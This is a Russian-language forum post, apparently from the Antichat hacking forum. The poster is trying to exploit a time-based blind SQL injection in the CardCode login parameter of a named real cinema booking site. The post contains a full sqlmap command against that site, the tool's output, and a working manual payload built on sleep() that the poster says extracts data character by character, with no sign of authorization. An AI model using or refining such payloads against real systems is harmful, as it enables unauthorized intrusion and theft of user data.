Форум АНТИЧАТ

Доброго времени суток. У меня возникла проблема с sqlmap. Сайт указан в коде, так что можете проверить. Нашёл time-based инъекцию в параметре CardCode и пытаюсь ею воспользоваться, но sqlmap почему-то не хочет:

Код:

Code:

c:\soft\sqlmap>sqlmap.py -u "kinomax.ru/booknow/" --data "what=Login&CardCode=94102&PIN=passw&cinema_id=31" -p CardCode --technique=T --risk 3 --level 5 --banner --dbms HSQLDB



    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:33:06



[02:33:08] [INFO] testing connection to the target URL

[02:33:08] [WARNING] heuristic (basic) test shows that POST parameter 'CardCode' might not be injectable

[02:33:08] [INFO] testing for SQL injection on POST parameter 'CardCode'

[02:33:09] [INFO] testing 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)'

[02:33:09] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..

[02:33:55] [INFO] POST parameter 'CardCode' is 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)' injectable

[02:33:55] [INFO] checking if the injection point on POST parameter 'CardCode' is a false positive

[02:34:14] [WARNING] false positive or unexploitable injection point detected

[02:34:14] [WARNING] POST parameter 'CardCode' is not injectable

[02:34:14] [CRITICAL] all tested parameters appear to be not injectable. Rerun without providing the option '--technique'. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 02:34:14

При этом очевидно, что инъекция юзабельна, например:

Код:

Code:

CardCode=94102'%2b(select%201%20from%20(select%20sleep(CHAR_LENGTH(VERSION())))A)%2b'

"зависнет" на 15 секунд, аналогично можно и коды символов вытаскивать. Есть ли возможность заставить sqlmap работать или может есть другой софт, который справится с такой задачей?